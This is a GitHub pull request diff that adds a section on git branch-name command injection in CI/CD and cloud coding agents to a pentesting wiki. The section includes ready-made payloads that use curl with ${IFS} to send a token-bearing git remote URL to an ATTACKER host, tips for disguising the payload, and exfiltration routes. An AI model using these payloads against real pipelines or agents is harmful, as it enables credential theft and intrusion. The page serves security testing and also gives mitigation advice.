Skip to content

How Command Injection Vulnerability in OpenAI Codex Leads to... #2074

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
+56 −0
Open

How Command Injection Vulnerability in OpenAI Codex Leads to... #2074

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
56 changes: 56 additions & 0 deletions src/pentesting-web/command-injection.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -266,6 +266,61 @@ java.lang.Runtime.getRuntime().exec(cmd);
- Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a payload with one command and exec it with a second request.
- Horizon3's [CVE-2023-27350.py](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., `proxychains` → Squid) when the service is only reachable internally.

## Git branch/ref name injection in CI/CD, code review and coding-agent setup

Some automation platforms accept a **repository + branch/ref** and later interpolate that value into a **shell command** during checkout, setup, review, or deployment. If the branch/ref reaches a shell without strict allowlisting or safe argument separation, **Git metadata becomes a command injection primitive**.

Typical vulnerable patterns:

- `git fetch origin $BRANCH`
- `git checkout $REF`
- `sh -c "git fetch origin $branch && git checkout $branch"`
- setup wrappers that log, clone, or review `refs/heads/...` values inside Bash

This matters in **CI/CD**, **GitHub Actions helpers**, **self-hosted review bots**, and **cloud coding agents** because branch names are often attacker-controlled in fork/PR workflows or by anyone who can create refs in the repo.

### What to test

1. Create a benign-looking branch name that should break command parsing, such as `-1`, and verify whether checkout/setup logs show syntax or git errors.
2. If spaces are blocked by the Git provider, replace them with `${IFS}` so Bash recreates whitespace at execution time.
3. Try shell metacharacters and command substitution inside the ref:

```bash
main;id;
main;curl${IFS}http://ATTACKER/$(whoami);
main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`;
```

4. If the UI truncates or visually hides branch names, test Unicode padding or unusual whitespace to disguise the payload while keeping the shell-relevant bytes intact.

### High-value post-exploitation target: authenticated git remotes

During early clone/setup stages, many systems temporarily configure `origin` with an embedded **PAT/OAuth token / installation token**:

```bash
git remote get-url origin
```

If command execution lands **before the token is removed/redacted**, this often leaks credentials that can be reused against GitHub/GitLab/Bitbucket or the CI provider itself.

Common exfiltration paths:

- Write the remote URL to a file and coerce the agent/review task to print that file later.
- Send it directly to attacker infrastructure:

```bash
main;curl${IFS}http://ATTACKER/`git${IFS}remote${IFS}get-url${IFS}origin`;
```

- Read task history/log APIs if the platform exposes backend endpoints that return job output without requiring UI interaction.

### Practical notes

- Branch restrictions are not enough. Git providers may block literal spaces but still allow strings such as `${IFS}`, metacharacters, or Unicode separators that become dangerous only when evaluated by a shell.
- This is especially dangerous when the malicious branch is set as the **default branch** or used in **automated code review** flows, because every victim job becomes a trigger.
- If the application uses `execve`/`subprocess.run([...])`/`execFile()` with each argument split safely, ref names stop being shell syntax and the bug usually disappears.
- If you are testing CI/CD abuse more broadly, see [Pentesting CI/CD](https://cloud.hacktricks.wiki/en/pentesting-ci-cd/pentesting-ci-cd-methodology.html).

## Brute-Force Detection List


Expand All @@ -287,5 +342,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
- [HTB: Gavel](https://0xdf.gitlab.io/2026/03/14/htb-gavel.html)
- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
- [BeyondTrust: How Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise](https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token)

{{#include ../banners/hacktricks-training.md}}